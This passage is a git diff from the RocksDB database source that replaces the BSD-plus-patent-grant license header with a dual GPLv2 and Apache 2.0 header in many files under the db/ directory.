COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/job_context.h b/db/job_context.h index f0670efc8d7..950a3a667db 100644 --- a/db/job_context.h +++ b/db/job_context.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/listener_test.cc b/db/listener_test.cc index 7ab49d0749d..5b5f2266b31 100644 --- a/db/listener_test.cc +++ b/db/listener_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/db_impl.h" #include "db/db_test_util.h" diff --git a/db/log_format.h b/db/log_format.h index 4e73dc63fa4..be22201af0a 100644 --- a/db/log_format.h +++ b/db/log_format.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/log_reader.cc b/db/log_reader.cc index 3d052ed29f0..cae5d8ea087 100644 --- a/db/log_reader.cc +++ b/db/log_reader.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/log_reader.h b/db/log_reader.h index 9a0baaa6400..c6a471cda44 100644 --- a/db/log_reader.h +++ b/db/log_reader.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/log_test.cc b/db/log_test.cc index 3ae2b425c6f..651a1d0eeee 100644 --- a/db/log_test.cc +++ b/db/log_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/log_writer.cc b/db/log_writer.cc index 36480c403ea..b02eec89dd9 100644 --- a/db/log_writer.cc +++ b/db/log_writer.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/log_writer.h b/db/log_writer.h index c6cb122330b..a3a879924e9 100644 --- a/db/log_writer.h +++ b/db/log_writer.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/malloc_stats.cc b/db/malloc_stats.cc index dbd2ddb7dfc..7acca65123e 100644 --- a/db/malloc_stats.cc +++ b/db/malloc_stats.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/malloc_stats.h b/db/malloc_stats.h index 212d447e293..a2f324ff18d 100644 --- a/db/malloc_stats.h +++ b/db/malloc_stats.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/managed_iterator.cc b/db/managed_iterator.cc index 33d5144c9d4..c393eb5a6fd 100644 --- a/db/managed_iterator.cc +++ b/db/managed_iterator.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/managed_iterator.h b/db/managed_iterator.h index db0438ebf54..8e962f781a2 100644 --- a/db/managed_iterator.h +++ b/db/managed_iterator.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/db/manual_compaction_test.cc b/db/manual_compaction_test.cc index 230894ab5e5..039b9080ed3 100644 --- a/db/manual_compaction_test.cc +++ b/db/manual_compaction_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Test for issue 178: a manual compaction causes deleted data to reappear. #include diff --git a/db/memtable.cc b/db/memtable.cc index 271b18e4351..efea6199af2 100644 --- a/db/memtable.cc +++ b/db/memtable.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/memtable.h b/db/memtable.h index c5a0a8cf6fa..fe9feaf5706 100644 --- a/db/memtable.h +++ b/db/memtable.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/memtable_list.cc b/db/memtable_list.cc index 90a619a218b..8f710c2e970 100644 --- a/db/memtable_list.cc +++ b/db/memtable_list.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "db/memtable_list.h" diff --git a/db/memtable_list.h b/db/memtable_list.h index bf20ff1f6a9..ed475b83a10 100644 --- a/db/memtable_list.h +++ b/db/memtable_list.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/db/memtable_list_test.cc b/db/memtable_list_test.cc index 081d61bffc7..30e51666372 100644 --- a/db/memtable_list_test.cc +++ b/db/memtable_list_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/memtable_list.h" #include diff --git a/db/merge_context.h b/db/merge_context.h index ec3d7473570..5e75e099731 100644 --- a/db/merge_context.h +++ b/db/merge_context.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include diff --git a/db/merge_helper.cc b/db/merge_helper.cc index a72b0456418..142486e5eb8 100644 --- a/db/merge_helper.cc +++ b/db/merge_helper.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/merge_helper.h" diff --git a/db/merge_helper.h b/db/merge_helper.h index 5f3ccd0d1e7..59da47a6b0b 100644 --- a/db/merge_helper.h +++ b/db/merge_helper.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef MERGE_HELPER_H #define MERGE_HELPER_H diff --git a/db/merge_helper_test.cc b/db/merge_helper_test.cc index 31d91013034..dc43db0d105 100644 --- a/db/merge_helper_test.cc +++ b/db/merge_helper_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/db/merge_operator.cc b/db/merge_operator.cc index ebd26beca3e..1981e65ba4e 100644 --- a/db/merge_operator.cc +++ b/db/merge_operator.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // /** * Back-end implementation details specific to the Merge Operator. diff --git a/db/merge_test.cc b/db/merge_test.cc index 37185a891da..b6582b7a596 100644 --- a/db/merge_test.cc +++ b/db/merge_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include #include diff --git a/db/options_file_test.cc b/db/options_file_test.cc index 8718f5a1404..fc62840eb47 100644 --- a/db/options_file_test.cc +++ b/db/options_file_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include diff --git a/db/perf_context_test.cc b/db/perf_context_test.cc index c49f9e11931..d06843a8303 100644 --- a/db/perf_context_test.cc +++ b/db/perf_context_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include #include diff --git a/db/pinned_iterators_manager.h b/db/pinned_iterators_manager.h index 6350b6014e1..7874eef6d77 100644 --- a/db/pinned_iterators_manager.h +++ b/db/pinned_iterators_manager.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include diff --git a/db/plain_table_db_test.cc b/db/plain_table_db_test.cc index 8fa59d40bcc..9ce50f28f69 100644 --- a/db/plain_table_db_test.cc +++ b/db/plain_table_db_test.cc @@ -1,11 +1,9 @@ // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/prefix_test.cc b/db/prefix_test.cc index 0b5fa87c4cc..a4ed201dad1 100644 --- a/db/prefix_test.cc +++ b/db/prefix_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/range_del_aggregator.cc b/db/range_del_aggregator.cc index 70ec35e79d7..0aa5d22cbcb 100644 --- a/db/range_del_aggregator.cc +++ b/db/range_del_aggregator.cc @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/range_del_aggregator.h" diff --git a/db/range_del_aggregator.h b/db/range_del_aggregator.h index bfa69fdc564..9d4b8ca1683 100644 --- a/db/range_del_aggregator.h +++ b/db/range_del_aggregator.h @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/db/range_del_aggregator_test.cc b/db/range_del_aggregator_test.cc index 2de049d5b8e..39029bd2a2e 100644 --- a/db/range_del_aggregator_test.cc +++ b/db/range_del_aggregator_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/db/repair.cc b/db/repair.cc index 58668bf4199..c248e6f43c4 100644 --- a/db/repair.cc +++ b/db/repair.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/repair_test.cc b/db/repair_test.cc index d713b3382a4..226e4e6d063 100644 --- a/db/repair_test.cc +++ b/db/repair_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/snapshot_impl.cc b/db/snapshot_impl.cc index bc29243bd53..032ef398aa5 100644 --- a/db/snapshot_impl.cc +++ b/db/snapshot_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/snapshot.h" diff --git a/db/snapshot_impl.h b/db/snapshot_impl.h index 0f804300e8f..b94602f2ae5 100644 --- a/db/snapshot_impl.h +++ b/db/snapshot_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/table_cache.cc b/db/table_cache.cc index 8aaaf975590..398556a08f9 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/table_cache.h b/db/table_cache.h index 85adba510a5..8b65bafa3ef 100644 --- a/db/table_cache.h +++ b/db/table_cache.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/table_properties_collector.cc b/db/table_properties_collector.cc index ebbc6c44835..a1f4dba97bb 100644 --- a/db/table_properties_collector.cc +++ b/db/table_properties_collector.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/table_properties_collector.h" diff --git a/db/table_properties_collector.h b/db/table_properties_collector.h index fd155634847..d8cd75689d5 100644 --- a/db/table_properties_collector.h +++ b/db/table_properties_collector.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file defines a collection of statistics collectors. #pragma once diff --git a/db/table_properties_collector_test.cc b/db/table_properties_collector_test.cc index 2c9f1d92c24..66c66c02531 100644 --- a/db/table_properties_collector_test.cc +++ b/db/table_properties_collector_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/db/transaction_log_impl.cc b/db/transaction_log_impl.cc index 5753a65f443..e22c0c4af05 100644 --- a/db/transaction_log_impl.cc +++ b/db/transaction_log_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #ifndef __STDC_FORMAT_MACROS diff --git a/db/transaction_log_impl.h b/db/transaction_log_impl.h index 11b692415c9..769d8339bd9 100644 --- a/db/transaction_log_impl.h +++ b/db/transaction_log_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/db/version_builder.cc b/db/version_builder.cc index 273708280e1..bab8d11f5a5 100644 --- a/db/version_builder.cc +++ b/db/version_builder.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_builder.h b/db/version_builder.h index 42c7064c956..235f79d7f5d 100644 --- a/db/version_builder.h +++ b/db/version_builder.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_builder_test.cc b/db/version_builder_test.cc index 28ea3fd957d..304df2a0455 100644 --- a/db/version_builder_test.cc +++ b/db/version_builder_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 